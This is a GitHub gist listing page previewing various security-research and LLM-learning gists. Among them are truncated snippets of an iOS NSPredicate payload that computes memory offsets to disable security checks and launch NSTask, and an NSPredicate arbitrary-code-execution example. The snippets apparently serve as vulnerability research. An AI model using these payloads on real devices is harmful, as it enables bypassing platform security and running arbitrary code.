Skip to content

Instantly share code, notes, and snippets.

View pwmoore's full-sized avatar

Phil pwmoore

32 followers · 125 following
View GitHub Profile
@tin-z
tin-z / VR_roadmap.md
Last active July 22, 2024 03:05
Becoming a Vulnerability Researcher roadmap: my personal experience
@veekaybee
veekaybee / normcore-llm.md
Last active July 26, 2024 01:10
Normcore LLM Reads

Anti-hype LLM reading list

Goals: Add links that are reasonable and good explanations of how stuff works. No hype and no vendor content if possible. Practical first-hand accounts of models in prod eagerly sought.

Foundational Concepts

Screenshot 2023-12-18 at 10 40 27 PM

Pre-Transformer Models

@aemmitt-ns
aemmitt-ns / restricted.m
Created May 19, 2023 14:06
program to dump out forbidden classes and selectors in NSPredicates
// dump classes and selectors forbidden in NSPredicates
// `cc -framework Foundation -o restricted restricted.m`
#import <Foundation/Foundation.h>
#import <dlfcn.h>
int main() {
void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0);
NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses");
NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors");
NSLog(@"Restricted Selectors: %@", RestrictedSelectors());
@kconner
kconner / macOS Internals.md
Last active July 7, 2024 19:42
macOS Internals

macOS Internals

Understand your Mac and iPhone more deeply by tracing the evolution of Mac OS X from prelease to Swift. John Siracusa delivers the details.

Starting Points

How to use this gist

You've got two main options:

@rain-1
rain-1 / LLM.md
Last active July 27, 2024 04:02
LLM Introduction: Learn Language Models

Purpose

Bootstrap knowledge of LLMs ASAP. With a bias/focus to GPT.

Avoid being a link dump. Try to provide only valuable well tuned information.

Prelude

Neural network links before starting with transformers.

@aemmitt-ns
aemmitt-ns / funtime.js
Last active December 30, 2023 06:26
funtime: detailed objective-c runtime tracing. ex `python funtime.py -n Messages '-[NSRegularExpression *]'`
const typeMap = {
"c": "char",
"i": "int",
"s": "short",
"l": "long",
"q": "long long",
"C": "unsigned char",
"I": "unsigned int",
"S": "unsigned short",
@aemmitt-ns
aemmitt-ns / nspredpayload.m
Last active December 30, 2023 06:26
NSPredicate payload for iOS that disables security checks and launches an NSTask
NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging
// use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way
"$_NSPredicateUtilities := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue,"
"$_predicateSecurityFlags := $_NSPredicateUtilities + 0x188c," // address of _predicateSecurityFlags
"$_predicateSecurityOnce := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce
"$forbiddenClassesLength := $_predicateSecurityFlags + 0x63a334," // address of length field for array of forbidden classes
"$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4," // address of length field for array of forbidden selectors
"$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class
"$NSPipe := $NSTask - 0x41a0," // address of NSPipe class
@aemmitt-ns
aemmitt-ns / predicament.m
Created April 9, 2022 03:20
Non-deprecated NSPredicate arbitrary code exec example
#import <Foundation/Foundation.h>
/*
[~/predicament]$ gcc -framework Foundation -lobjc -o predicament predicament.m
[~/predicament]$ ./predicament "function('','stringByAppendingFormat:','%lld ').longLongValue"
Expr: 'FUNCTION("", "stringByAppendingFormat:" , "%lld ").longLongValue' (type: 4)
Value: 105553129238592
Danger: 105553129237664 (offset 928)
[~/predicament]$ ./predicament "function(function('','stringByAppendingFormat:','%lld ').longLongValue-928,'longValue').dangerous"
@muff-in
muff-in / resources.md
Last active July 28, 2024 09:13
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
@Siguza
Siguza / pallas.sh
Last active July 17, 2024 19:15
newstyle OTA
#!/usr/bin/env zsh
set -e;
set +m; # Job control would've been nice, but manual round robin it is, sigh.
if [ -z "${ZSH_VERSION+x}" ]; then
echo 'Try again with zsh.';
exit 1;
fi;